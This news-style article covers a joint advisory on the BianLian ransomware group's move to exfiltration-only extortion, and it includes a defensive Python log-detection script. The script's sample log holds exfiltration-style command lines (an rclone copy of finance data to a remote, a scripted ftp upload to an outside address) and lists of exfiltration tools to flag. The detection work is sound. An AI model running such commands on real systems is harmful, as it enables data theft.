BianLian Ransomware Group Shifts to Data Exfiltration-Based Extortion Tactics
Introduction
The US Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Australian Cyber Security Centre (ACSC) have issued an advisory warning organizations about the ransomware developer and data extortion group, BianLian. The group has been active since 2022, and has shifted its attack methods from encryption-based extortion to data exfiltration-based extortion.
BianLian’s Tactics
BianLian is known for using a double-extortion model, where it encrypts victims’ systems and steals data, threatening to release the acquired data if the payment is not received. However, in the past few months, it has shifted its attack strategy to exfiltration-based extortion. The group uses stolen remote desktop protocol (RDP) credentials to access victims’ networks, and then moves around the network using open-source tools and command-line scripting. Once it has exfiltrated the data using File Transfer Protocol (FTP), Rclone, or Mega, it goes on to extort its victims.
BianLian’s Targets
BianLian has targeted critical infrastructure organizations in the US and Australia, as well as professional services and property development organizations. Cybersecurity service provider [redacted] released research on the group in March, detailing its high level of operational security and its skill at network penetration, as well as its continued growth while operating as a ransomware organization.
Response from Cybersecurity Experts
Tom Kellermann, Senior Vice President of Cyberstrategy at Contrast Security, stated that “More often than not, extortion via data leak is the modus operandi of choice.” He believes that this shift is due to the successful collaboration between law enforcement and the cyber community to not only decrypt the ransomware but also disrupt the infrastructure that sustains it.
Recommendations
CISA has urged organizations to implement the mitigations provided in the advisory to prevent these types of attacks. These mitigations include auditing remote access tools, reviewing logs for execution of remote access software, and enabling enhanced PowerShell logging. Organizations must also remain vigilant in ensuring that their employees are not using weak passwords, as this is often how attackers gain access to networks.
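The advisory's two log-review mitigations (auditing remote access tools and reviewing logs for execution of remote access software) and the exfiltration tooling named above (FTP, Rclone, Mega) can be turned into a simple process-creation log check. The following Python is an added example, not code from the advisory or from any vendor; the log lines are constructed in a simplified key=value format loosely modelled on Windows process-creation events, the IP address is a documentation address, and the tool lists and the approved install path are illustrative assumptions that an organization would replace with its own inventory.

```python
"""Flag remote-access and exfiltration tooling in process-creation log lines.

Added example. The log format, tool lists and approved-path inventory below
are assumptions for illustration, not the advisory's own data.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample log lines (simplified key=value process-creation records).
SAMPLE_LOG = r"""
ts=2023-05-16T09:12:03Z host=FS01 user=CORP\jdoe image=C:\Windows\System32\svchost.exe cmdline="svchost.exe -k netsvcs"
ts=2023-05-16T09:14:51Z host=FS01 user=CORP\jdoe image=C:\Program Files\TeamViewer\TeamViewer.exe cmdline="TeamViewer.exe"
ts=2023-05-16T09:20:17Z host=FS01 user=CORP\svc_backup image=C:\Users\Public\rclone.exe cmdline="rclone.exe copy D:\Finance remote:share --transfers 8"
ts=2023-05-16T09:22:40Z host=WS07 user=CORP\asmith image=C:\Windows\System32\ftp.exe cmdline="ftp.exe -s:C:\Users\asmith\AppData\Local\Temp\up.txt 203.0.113.10"
ts=2023-05-16T09:25:02Z host=WS07 user=CORP\asmith image=C:\Users\asmith\Downloads\MEGAsync.exe cmdline="MEGAsync.exe"
ts=2023-05-16T09:30:11Z host=WS07 user=CORP\asmith image=C:\Windows\System32\notepad.exe cmdline="notepad.exe notes.txt"
"""

LINE_RE = re.compile(
    r'ts=(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) '
    r'image=(?P<image>.+?) cmdline="(?P<cmdline>.*)"$'
)

# Illustrative lists (assumptions): executables of common remote access tools,
# the install paths the organization has approved for them, and the exfiltration
# clients the advisory text mentions (FTP, Rclone, Mega).
REMOTE_ACCESS_TOOLS = {"teamviewer.exe", "anydesk.exe", "splashtop.exe", "screenconnect.exe"}
APPROVED_REMOTE_ACCESS = {r"c:\program files (x86)\anydesk\anydesk.exe"}
EXFIL_TOOLS = {"rclone.exe": "Rclone", "ftp.exe": "FTP client", "megasync.exe": "Mega client"}

# An rclone remote looks like "name:path"; require two or more characters before
# the colon so that Windows drive letters such as "D:\Finance" are not matched.
RCLONE_REMOTE_RE = re.compile(r"(?<!\S)([A-Za-z][A-Za-z0-9_-]+):")


@dataclass
class Event:
    ts: str
    host: str
    user: str
    image: str
    cmdline: str

    @property
    def exe(self) -> str:
        """Lower-cased file name of the executed image."""
        return self.image.rsplit("\\", 1)[-1].lower()


@dataclass
class Finding:
    category: str
    detail: str
    event: Event


def parse_log(text: str) -> list[Event]:
    """Parse the key=value records; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(Event(**m.groupdict()))
    return events


def detect(events: list[Event]) -> list[Finding]:
    """Apply the two rules: unsanctioned remote access tool, exfiltration tool."""
    findings = []
    for e in events:
        if e.exe in REMOTE_ACCESS_TOOLS and e.image.lower() not in APPROVED_REMOTE_ACCESS:
            findings.append(Finding("remote-access", f"{e.exe} running outside approved inventory", e))
        if e.exe in EXFIL_TOOLS:
            detail = EXFIL_TOOLS[e.exe]
            if e.exe == "rclone.exe":
                remotes = RCLONE_REMOTE_RE.findall(e.cmdline)
                if remotes:
                    detail += " copying to remote(s): " + ", ".join(remotes)
            findings.append(Finding("exfil-tooling", detail, e))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per category, e.g. for a daily review report."""
    return dict(Counter(f.category for f in findings))


if __name__ == "__main__":
    for f in detect(parse_log(SAMPLE_LOG)):
        print(f"{f.event.ts} {f.event.host} {f.event.user} [{f.category}] {f.detail}")
    print(summarize(detect(parse_log(SAMPLE_LOG))))
```

Run against the constructed lines, the script reports the TeamViewer process (not in the approved inventory), the Rclone copy to a configured remote, the scripted FTP session and the Mega client, and leaves svchost and notepad alone. In practice the records would come from Windows event 4688 or Sysmon event 1 with command-line auditing enabled, and the approved-path set would be generated from the organization's own software inventory rather than hard-coded.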
Conclusion
BianLian’s shift towards data exfiltration-based extortion tactics highlights the need for organizations to focus on securing their data in addition to protecting against ransomware attacks. It is essential that organizations take proactive measures to protect themselves against these types of attacks, and work closely with cybersecurity experts to develop robust security measures to safeguard their networks and data. Moreover, organizations must regularly raise awareness among employees about the latest cyber threats and deploy the latest security tools and technologies to stay ahead of the ever-evolving threat landscape.